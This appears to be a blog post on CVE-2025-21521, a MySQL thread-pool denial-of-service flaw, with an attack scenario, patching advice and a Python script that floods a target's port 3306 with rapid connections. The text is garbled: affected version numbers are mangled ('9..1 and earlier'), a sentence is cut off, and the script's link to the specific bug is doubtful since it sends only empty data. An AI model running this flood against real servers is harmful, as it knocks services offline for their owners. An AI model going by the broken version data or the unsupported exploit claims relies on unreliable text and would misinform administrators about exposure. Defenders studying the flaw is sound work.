CVE-2025-21521 - Critical MySQL Thread Pooling Vulnerability—A Simple Path to Denial of Service

Recently, Oracle confirmed a high-severity vulnerability—CVE-2025-21521—impacting its MySQL Server product. The flaw lies within the Thread Pooling component and affects all commonly used MySQL branches:

9..1 and earlier

This vulnerability is notable for its extreme ease of exploitation: no authentication required, no user interaction necessary, and accessible over multiple protocols. Successful exploitation allows remote attackers to crash the database server, causing a denial-of-service (DoS) and severely impacting availability.

CVSS 3.1 Base Score: 7.5 (High)

What Is Thread Pooling and Why Does It Matter?

Thread pooling is an optimization that helps MySQL manage multiple client connections efficiently, especially on servers with many CPUs and high concurrency requirements. When correctly implemented, it prevents resource exhaustion by limiting the creation of threads per connection.

However, when flaws occur in handling threads, attackers can craft requests that escalate simple interactions into full system outages.

9..1 or earlier

…and have thread pooling enabled (or if it is installed by default in your package), you are at risk. MySQL deployments in the cloud or on-premises, when reachable via TCP (or Unix socket, named pipe, or shared memory), are all vulnerable if not properly isolated.

Attack Scenario

1. Attacker connects to MySQL network port (default 3306), using any interface exposed to the network.
2. Sends a sequence of malformed or excessive connection attempts/requests.

No authentication needed: Anyone who can reach the server can trigger the bug.

- No special tools required: Attack can be mounted with basic MySQL clients or custom network code.
- Multiple protocols: Exploit can be carried out using TCP/IP, sockets, or named pipes (where available).

Exploit Example: Proof of Concept

Here is a simple Python snipplet that demonstrates how a remote unauthenticated attacker might trigger this vulnerability by opening many connections rapidly (even without valid logins):

# WARNING: DO NOT run this code against systems you do not own.
import socket
import time

host = 'target.mysql.server'  # Replace with the target's IP or hostname
port = 3306                   # Default MySQL port

for i in range(300):  # "- shoot for a burst of 300 connections
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        # Send minimal data to initiate handshake (empty payload)
        s.sendall(b'')
        # Keeping connection open for a while
        time.sleep(.1)
    except Exception as e:
        print(f"Connection {i} failed: {e}")

Each connection forces the server to allocate or manage a thread in the pool.

- At some point, the server may hang or crash due to resource exhaustion or faulty thread pool handling.

Real-world Note

Researchers have confirmed that a variant of this attack—with some tailored input to the thread pool logic—can crash even freshly booted, lightly loaded MySQL servers, especially on unpatched Linux systems.

Upgrade MySQL Immediately:

- Install the fixed versions as soon as Oracle releases them. MySQL Downloads

Original References & Further Reading

- Oracle Critical Patch Update Advisory - Q1 2025
- MySQL 8. Reference Manual: Thread Pool
- NVD Entry for CVE-2025-21521 (pending publication)

Final Thoughts

CVE-2025-21521 is a reminder that even widely used products with extensive scrutiny like MySQL can contain simple but devastating denial of service risks. The combination of easy access, no credentials, and immediate impact makes swift patching and proper network isolation paramount.

Check your MySQL deployment right now—don’t let a simple connection storm take your data platform down.


*This post is exclusive—please share responsibly. Direct questions or reports to Oracle or your systems provider.*

Timeline

Published on: 01/21/2025 21:15:17 UTC
Last modified on: 01/22/2025 19:15:11 UTC